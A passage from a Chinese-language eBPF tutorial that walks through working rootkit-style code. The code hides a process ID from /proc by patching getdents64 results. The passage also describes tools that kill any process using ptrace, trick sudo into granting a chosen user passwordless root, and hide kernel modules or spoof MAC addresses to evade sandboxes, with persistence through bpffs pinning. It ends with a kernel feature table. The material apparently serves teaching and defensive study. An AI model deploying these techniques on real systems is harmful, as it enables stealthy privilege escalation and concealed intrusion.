int ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
if (ppid != target_ppid) {
|
||
return 0;
|
||
}
|
||
}
|
||
int pid = pid_tgid >> 32;
|
||
unsigned int fd = ctx->args[0];
|
||
unsigned int buff_count = ctx->args[2];
|
||
|
||
// Store params in map for exit function
|
||
struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1];
|
||
bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 <code>getdents64</code> 系统调用的入口处进行处理。</p>
|
||
<p>我们首先声明了几个全局的变量。其中 <code>target_ppid</code> 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。<code>pid_to_hide_len</code> 和 <code>pid_to_hide</code> 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 <code>/proc/</code> 目录下的一个文件夹的名称,因此被隐藏的进程在 <code>/proc/</code> 目录下将无法被看到。</p>
|
||
<p>接下来,我们声明了一个名为 <code>linux_dirent64</code> 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。</p>
|
||
<p>然后是 <code>getdents64</code> 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。</p>
|
||
<p>随后的部分是 eBPF 程序的具体实现。我们在 <code>getdents64</code> 系统调用的入口处定义了一个名为 <code>handle_getdents_enter</code> 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 <code>target_ppid</code>,那么我们就只关注那些父进程的 PID 为 <code>target_ppid</code> 的进程。如果 <code>target_ppid</code> 为 0,我们就关注所有进程。</p>
|
||
<p>在确认了当前进程是我们关注的进程之后,我们将 <code>getdents64</code> 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 <code>getdents64</code> 系统调用的第二个参数,它是一个指向 <code>linux_dirent64</code> 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 <code>map_buffs</code> 这个 map 中。</p>
|
||
<p>至此,我们完成了 <code>getdents64</code> 系统调用入口处的处理。在系统调用返回时,我们将会在 <code>handle_getdents_exit</code> 函数中,对目录项进行修改,以实现进程隐藏。</p>
|
||
<p>在接下来的代码段中,我们将要实现在 <code>getdents64</code> 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。</p>
|
||
<p>我们首先定义了一个名为 <code>handle_getdents_exit</code> 的函数,它将在 <code>getdents64</code> 系统调用返回时被调用。</p>
|
||
<pre><code class="language-c">
|
||
SEC("tp/syscalls/sys_exit_getdents64")
|
||
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
int total_bytes_read = ctx->ret;
|
||
// if bytes_read is 0, everything's been read
|
||
if (total_bytes_read <= 0) {
|
||
return 0;
|
||
}
|
||
|
||
// Check we stored the address of the buffer from the syscall entry
|
||
long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
|
||
if (pbuff_addr == 0) {
|
||
return 0;
|
||
}
|
||
|
||
// All of this is quite complex, but basically boils down to
|
||
// Calling 'handle_getdents_exit' in a loop to iterate over the file listing
|
||
// in chunks of 200, and seeing if a folder with the name of our pid is in there.
|
||
// If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
|
||
// patching
|
||
long unsigned int buff_addr = *pbuff_addr;
|
||
struct linux_dirent64 *dirp = 0;
|
||
int pid = pid_tgid >> 32;
|
||
short unsigned int d_reclen = 0;
|
||
char filename[max_pid_len];
|
||
|
||
unsigned int bpos = 0;
|
||
unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
|
||
if (pBPOS != 0) {
|
||
bpos = *pBPOS;
|
||
}
|
||
|
||
for (int i = 0; i < 200; i ++) {
|
||
if (bpos >= total_bytes_read) {
|
||
break;
|
||
}
|
||
dirp = (struct linux_dirent64 *)(buff_addr+bpos);
|
||
bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
|
||
|
||
int j = 0;
|
||
for (j = 0; j < pid_to_hide_len; j++) {
|
||
if (filename[j] != pid_to_hide[j]) {
|
||
break;
|
||
}
|
||
}
|
||
if (j == pid_to_hide_len) {
|
||
// ***********
|
||
// We've found the folder!!!
|
||
// Jump to handle_getdents_patch so we can remove it!
|
||
// ***********
|
||
bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
|
||
bpf_map_delete_elem(&map_buffs, &pid_tgid);
|
||
bpf_tail_call(ctx, &map_prog_array, PROG_02);
|
||
}
|
||
bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);
|
||
bpos += d_reclen;
|
||
}
|
||
|
||
// If we didn't find it, but there's still more to read,
|
||
// jump back the start of this function and keep looking
|
||
if (bpos < total_bytes_read) {
|
||
bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
|
||
bpf_tail_call(ctx, &map_prog_array, PROG_01);
|
||
}
|
||
bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
|
||
bpf_map_delete_elem(&map_buffs, &pid_tgid);
|
||
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。</p>
|
||
<p>然后我们从 <code>map_buffs</code> 这个 map 中获取 <code>getdents64</code> 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。</p>
|
||
<p>接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 <code>bpf_tail_call</code> 函数跳转到 <code>handle_getdents_patch</code> 函数,进行实际的隐藏操作。</p>
|
||
<pre><code class="language-c">SEC("tp/syscalls/sys_exit_getdents64")
|
||
int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
// Only patch if we've already checked and found our pid's folder to hide
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
|
||
if (pbuff_addr == 0) {
|
||
return 0;
|
||
}
|
||
|
||
// Unlink target, by reading in previous linux_dirent64 struct,
|
||
// and setting it's d_reclen to cover itself and our target.
|
||
// This will make the program skip over our folder.
|
||
long unsigned int buff_addr = *pbuff_addr;
|
||
struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
|
||
short unsigned int d_reclen_previous = 0;
|
||
bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);
|
||
|
||
struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous);
|
||
short unsigned int d_reclen = 0;
|
||
bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
|
||
|
||
// Debug print
|
||
char filename[max_pid_len];
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
|
||
filename[pid_to_hide_len-1] = 0x00;
|
||
bpf_printk("[PID_HIDE] filename previous %s\n", filename);
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
|
||
filename[pid_to_hide_len-1] = 0x00;
|
||
bpf_printk("[PID_HIDE] filename next one %s\n", filename);
|
||
|
||
// Attempt to overwrite
|
||
short unsigned int d_reclen_new = d_reclen_previous + d_reclen;
|
||
long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
|
||
|
||
// Send an event
|
||
struct event *e;
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (e) {
|
||
e->success = (ret == 0);
|
||
e->pid = (pid_tgid >> 32);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
bpf_ringbuf_submit(e, 0);
|
||
}
|
||
|
||
bpf_map_delete_elem(&map_to_patch, &pid_tgid);
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>在 <code>handle_getdents_patch</code> 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 <code>d_reclen</code> 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。</p>
|
||
<p>在这个过程中,我们用到了 <code>bpf_probe_read_user</code>、<code>bpf_probe_read_user_str</code>、<code>bpf_probe_write_user</code> 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。</p>
|
||
<p>在我们完成隐藏操作后,我们会向一个名为 <code>rb</code> 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 <code>bpf_ringbuf_reserve</code> 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 <code>bpf_ringbuf_submit</code> 函数将事件提交到缓冲区。</p>
|
||
<p>最后,我们清理了之前保存在 map 中的数据,并返回。</p>
|
||
<p>这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。</p>
|
||
<h2 id="用户态-ebpf-程序实现"><a class="header" href="#用户态-ebpf-程序实现">用户态 eBPF 程序实现</a></h2>
|
||
<p>我们在用户态的 eBPF 程序中主要进行了以下几个操作:</p>
|
||
<ol>
|
||
<li>打开 eBPF 程序。</li>
|
||
<li>设置我们想要隐藏的进程的 PID。</li>
|
||
<li>验证并加载 eBPF 程序。</li>
|
||
<li>等待并处理由 eBPF 程序发送的事件。</li>
|
||
</ol>
|
||
<p>首先,我们打开了 eBPF 程序。这个过程是通过调用 <code>pidhide_bpf__open</code> 函数实现的。如果这个过程失败了,我们就直接返回。</p>
|
||
<pre><code class="language-c"> skel = pidhide_bpf__open();
|
||
if (!skel)
|
||
{
|
||
fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
|
||
return 1;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 <code>rodata</code> 区域实现的。默认情况下,我们隐藏的是当前进程。</p>
|
||
<pre><code class="language-c"> char pid_to_hide[10];
|
||
if (env.pid_to_hide == 0)
|
||
{
|
||
env.pid_to_hide = getpid();
|
||
}
|
||
sprintf(pid_to_hide, "%d", env.pid_to_hide);
|
||
strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
|
||
skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1;
|
||
skel->rodata->target_ppid = env.target_ppid;
|
||
</code></pre>
|
||
<p>然后,我们验证并加载 eBPF 程序。这个过程是通过调用 <code>pidhide_bpf__load</code> 函数实现的。如果这个过程失败了,我们就进行清理操作。</p>
|
||
<pre><code class="language-c"> err = pidhide_bpf__load(skel);
|
||
if (err)
|
||
{
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 <code>ring_buffer__poll</code> 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 <code>handle_event</code> 函数来处理这个事件。</p>
|
||
<pre><code class="language-c">printf("Successfully started!\n");
|
||
printf("Hiding PID %d\n", env.pid_to_hide);
|
||
while (!exiting)
|
||
{
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
/* Ctrl-C will cause -EINTR */
|
||
if (err == -EINTR)
|
||
{
|
||
err = 0;
|
||
break;
|
||
}
|
||
if (err < 0)
|
||
{
|
||
printf("Error polling perf buffer: %d\n", err);
|
||
break;
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p><code>handle_event</code> 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 <code>event</code> 结构体,然后根据 <code>success</code> 字段判断这个事件是否表示成功隐藏了一个进程,最后打</p>
|
||
<p>印相应的消息。</p>
|
||
<pre><code class="language-c">static int handle_event(void *ctx, void *data, size_t data_sz)
|
||
{
|
||
const struct event *e = data;
|
||
if (e->success)
|
||
printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
|
||
else
|
||
printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。</p>
|
||
<p>完整源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide</a></p>
|
||
<blockquote>
|
||
<p>本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。</p>
|
||
</blockquote>
|
||
<h2 id="编译运行隐藏-pid"><a class="header" href="#编译运行隐藏-pid">编译运行,隐藏 PID</a></h2>
|
||
<p>首先,我们需要编译 eBPF 程序:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令:</p>
|
||
<pre><code class="language-sh">sudo ./pidhide --pid-to-hide 1534
|
||
</code></pre>
|
||
<p>这条命令将使所有尝试读取 <code>/proc/</code> 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏:</p>
|
||
<pre><code class="language-console">$ ps -aux | grep 1534
|
||
yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor
|
||
yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534
|
||
</code></pre>
|
||
<p>此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 <code>sudo ./pidhide --pid-to-hide 1534</code>,再次运行 <code>ps -aux | grep 1534</code>,就会发现进程 ID 为 1534 的进程已经不见了。</p>
|
||
<pre><code class="language-console">$ sudo ./pidhide --pid-to-hide 1534
|
||
Hiding PID 1534
|
||
Hid PID from program 31529 (ps)
|
||
Hid PID from program 31551 (ps)
|
||
Hid PID from program 31560 (ps)
|
||
Hid PID from program 31582 (ps)
|
||
Hid PID from program 31582 (ps)
|
||
Hid PID from program 31585 (bash)
|
||
Hid PID from program 31585 (bash)
|
||
Hid PID from program 31609 (bash)
|
||
Hid PID from program 31640 (ps)
|
||
Hid PID from program 31649 (ps)
|
||
</code></pre>
|
||
<p>这个程序将匹配这个 pid 的进程隐藏,使得像 <code>ps</code> 这样的工具无法看到,我们可以通过 <code>ps aux | grep 1534</code> 来验证。</p>
|
||
<pre><code class="language-console">$ ps -aux | grep 1534
|
||
root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534
|
||
root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534
|
||
root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534
|
||
yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534
|
||
</code></pre>
|
||
<h2 id="总结-19"><a class="header" href="#总结-19">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。</p>
|
||
<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,包括如何使用 eBPF 进行网络和系统性能分析,如何编写更复杂的 eBPF 程序以及如何将 eBPF 集成到您的应用中。希望你会在我们的教程中找到有用的信息,进一步提升你的 eBPF 开发技能。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="用-bpf_send_signal-发送信号终止恶意进程"><a class="header" href="#用-bpf_send_signal-发送信号终止恶意进程">用 bpf_send_signal 发送信号终止恶意进程</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-bash">sudo ./bpfdos
|
||
</code></pre>
|
||
<p>这个程序会对任何试图使用 <code>ptrace</code> 系统调用的程序,例如 <code>strace</code>,发出 <code>SIG_KILL</code> 信号。
|
||
一旦 bpf-dos 开始运行,你可以通过运行以下命令进行测试:</p>
|
||
<pre><code class="language-bash">strace /bin/whoami
|
||
</code></pre>
|
||
<h2 id="参考资料-2"><a class="header" href="#参考资料-2">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="使用-ebpf-添加-sudo-用户"><a class="header" href="#使用-ebpf-添加-sudo-用户">使用 eBPF 添加 sudo 用户</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-sh">sudo ./sudoadd --username lowpriv-user
|
||
</code></pre>
|
||
<p>这个程序允许一个通常权限较低的用户使用 <code>sudo</code> 成为 root。</p>
|
||
<p>它通过拦截 <code>sudo</code> 读取 <code>/etc/sudoers</code> 文件,并将第一行覆盖为 <code><username> ALL=(ALL:ALL) NOPASSWD:ALL #</code> 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 <code>cat</code> 或 <code>sudoedit</code> 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 <code>#</code> 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。</p>
|
||
<h2 id="参考资料-3"><a class="header" href="#参考资料-3">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="使用-ebpf-替换任意程序读取或写入的文本"><a class="header" href="#使用-ebpf-替换任意程序读取或写入的文本">使用 eBPF 替换任意程序读取或写入的文本</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-sh">sudo ./replace --filename /path/to/file --input foo --replace bar
|
||
</code></pre>
|
||
<p>这个程序将文件中所有与 <code>input</code> 匹配的文本替换为 <code>replace</code> 文本。
|
||
这有很多用途,例如:</p>
|
||
<p>隐藏内核模块 <code>joydev</code>,避免被如 <code>lsmod</code> 这样的工具发现:</p>
|
||
<pre><code class="language-bash">./replace -f /proc/modules -i 'joydev' -r 'cryptd'
|
||
</code></pre>
|
||
<p>伪造 <code>eth0</code> 接口的 MAC 地址:</p>
|
||
<pre><code class="language-bash">./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'
|
||
</code></pre>
|
||
<p>恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。</p>
|
||
<p><strong>注意:</strong> <code>input</code> 和 <code>replace</code> 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 <code>$'\n'</code>,例如 <code>--replace $'text\n'</code>。</p>
|
||
<h2 id="参考资料-4"><a class="header" href="#参考资料-4">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="在用户态应用退出后运行-ebpf-程序ebpf-程序的生命周期"><a class="header" href="#在用户态应用退出后运行-ebpf-程序ebpf-程序的生命周期">在用户态应用退出后运行 eBPF 程序:eBPF 程序的生命周期</a></h1>
|
||
<p>通过使用 detach 的方式运行 eBPF 程序,用户空间加载器可以退出,而不会停止 eBPF 程序。</p>
|
||
<h2 id="ebpf-程序的生命周期"><a class="header" href="#ebpf-程序的生命周期">eBPF 程序的生命周期</a></h2>
|
||
<p>首先,我们需要了解一些关键的概念,如 BPF 对象(包括程序,地图和调试信息),文件描述符 (FD),引用计数(refcnt)等。在 eBPF 系统中,用户空间通过文件描述符访问 BPF 对象,而每个对象都有一个引用计数。当一个对象被创建时,其引用计数初始为1。如果该对象不再被使用(即没有其他程序或文件描述符引用它),它的引用计数将降至0,并在 RCU 宽限期后被内存清理。</p>
|
||
<p>接下来,我们需要了解 eBPF 程序的生命周期。首先,当你创建一个 BPF 程序,并将它连接到某个“钩子”(例如网络接口,系统调用等),它的引用计数会增加。然后,即使原始创建和加载该程序的用户空间进程退出,只要 BPF 程序的引用计数大于 0,它就会保持活动状态。然而,这个过程中有一个重要的点是:不是所有的钩子都是相等的。有些钩子是全局的,比如 XDP、tc's clsact 和 cgroup-based 钩子。这些全局钩子会一直保持 BPF 程序的活动状态,直到这些对象自身消失。而有些钩子是局部的,只在拥有它们的进程存活期间运行。</p>
|
||
<p>对于 BPF 对象(程序或映射)的生命周期管理,另一个关键的操作是“分离”(detach)。这个操作会阻止已附加程序的任何未来执行。然后,对于需要替换 BPF 程序的情况,你可以使用替换(replace)操作。这是一个复杂的过程,因为你需要确保在替换过程中,不会丢失正在处理的事件,而且新旧程序可能在不同的 CPU 上同时运行。</p>
|
||
<p>最后,除了通过文件描述符和引用计数来管理 BPF 对象的生命周期,还有一个叫做 BPFFS 的方法,也就是“BPF 文件系统”。用户空间进程可以在 BPFFS 中“固定”(pin)一个 BPF 程序或映射,这将增加对象的引用计数,使得即使 BPF 程序未附加到任何地方或 BPF 映射未被任何程序使用,该 BPF 对象也将保持活动状态。</p>
|
||
<p>所以,当我们谈论在后台运行 eBPF 程序时,我们需要清楚这个过程的含义。在某些情况下,即使用户空间进程已经退出,我们可能还希望 BPF 程序保持运行。这就需要我们正确地管理 BPF 对象的生命周期</p>
|
||
<h2 id="运行"><a class="header" href="#运行">运行</a></h2>
|
||
<p>这里还是采用了上一个的字符串替换的应用,来体现对应可能的安全风险。通过使用 <code>--detach</code> 运行程序,用户空间加载器可以退出,而不会停止 eBPF 程序。</p>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>在运行前,请首先确保 bpf 文件系统已经被挂载:</p>
|
||
<pre><code class="language-bash">sudo mount bpffs -t bpf /sys/fs/bpf
|
||
mkdir /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<p>然后,你可以分离运行 text-replace2:</p>
|
||
<pre><code class="language-bash">./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d
|
||
</code></pre>
|
||
<p>这将在 <code>/sys/fs/bpf/textreplace</code> 下创建一些 eBPF 链接文件。
|
||
一旦加载器成功运行,你可以通过运行以下命令检查日志:</p>
|
||
<pre><code class="language-bash">sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
# 确认链接文件存在
|
||
sudo ls -l /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<p>然后,要停止,只需删除链接文件即可:</p>
|
||
<pre><code class="language-bash">sudo rm -r /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<h2 id="参考资料-5"><a class="header" href="#参考资料-5">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
<li><a href="https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html">https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bpf-features-by-linux-kernel-version"><a class="header" href="#bpf-features-by-linux-kernel-version">BPF Features by Linux Kernel Version</a></h1>
|
||
<h2 id="ebpf-support"><a class="header" href="#ebpf-support">eBPF support</a></h2>
|
||
<div class="table-wrapper"><table><thead><tr><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="jit-compiling"><a class="header" href="#jit-compiling">JIT compiling</a></h2>
|
||
<p>The list of supported architectures for your kernel can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep HAVE_EBPF_JIT arch/
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature / Architecture</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>x86_64</td><td>3.16</td><td><a href="https://github.com/torvalds/linux/commit/622582786c9e041d0bd52bde201787adeab249f8"><code>622582786c9e</code></a></td></tr>
|
||
<tr><td>ARM64</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/e54bcde3d69d40023ae77727213d14f920eb264a"><code>e54bcde3d69d</code></a></td></tr>
|
||
<tr><td>s390</td><td>4.1</td><td><a href="https://github.com/torvalds/linux/commit/054623105728b06852f077299e2bf1bf3d5f2b0b"><code>054623105728</code></a></td></tr>
|
||
<tr><td>Constant blinding for JIT machines</td><td>4.7</td><td><a href="https://github.com/torvalds/linux/commit/4f3446bb809f20ad56cadf712e6006815ae7a8f9"><code>4f3446bb809f</code></a></td></tr>
|
||
<tr><td>PowerPC64</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/156d0e290e969caba25f1851c52417c14d141b24"><code>156d0e290e96</code></a></td></tr>
|
||
<tr><td>Constant blinding - PowerPC64</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/b7b7013cac55d794940bd9cb7b7c55c9dececac4"><code>b7b7013cac55</code></a></td></tr>
|
||
<tr><td>Sparc64</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/7a12b5031c6b947cc13918237ae652b536243b76"><code>7a12b5031c6b</code></a></td></tr>
|
||
<tr><td>MIPS</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/f381bf6d82f032b7410185b35d000ea370ac706b"><code>f381bf6d82f0</code></a></td></tr>
|
||
<tr><td>ARM32</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/39c13c204bb1150d401e27d41a9d8b332be47c49"><code>39c13c204bb1</code></a></td></tr>
|
||
<tr><td>x86_32</td><td>4.18</td><td><a href="https://github.com/torvalds/linux/commit/03f5781be2c7b7e728d724ac70ba10799cc710d7"><code>03f5781be2c7</code></a></td></tr>
|
||
<tr><td>RISC-V RV64G</td><td>5.1</td><td><a href="https://github.com/torvalds/linux/commit/2353ecc6f91fd15b893fa01bf85a1c7a823ee4f2"><code>2353ecc6f91f</code></a></td></tr>
|
||
<tr><td>RISC-V RV32G</td><td>5.7</td><td><a href="https://github.com/torvalds/linux/commit/5f316b65e99f109942c556dc8790abd4c75bcb34"><code>5f316b65e99f</code></a></td></tr>
|
||
<tr><td>PowerPC32</td><td>5.13</td><td><a href="https://github.com/torvalds/linux/commit/51c66ad849a703d9bbfd7704c941827aed0fd9fd"><code>51c66ad849a7</code></a></td></tr>
|
||
<tr><td>LoongArch</td><td>6.1</td><td><a href="https://github.com/torvalds/linux/commit/5dc615520c4dfb358245680f1904bad61116648e"><code>5dc615520c4d</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="main-features"><a class="header" href="#main-features">Main features</a></h2>
|
||
<p>Several (but not all) of these <em>main features</em> translate to an eBPF program type.
|
||
The list of such program types supported in your kernel can be found in file
|
||
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_prog_type {' include/uapi/linux/bpf.h
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td><code>AF_PACKET</code> (libpcap/tcpdump, <code>cls_bpf</code> classifier, netfilter's <code>xt_bpf</code>, team driver's load-balancing mode…)</td><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
<tr><td>Kernel helpers</td><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
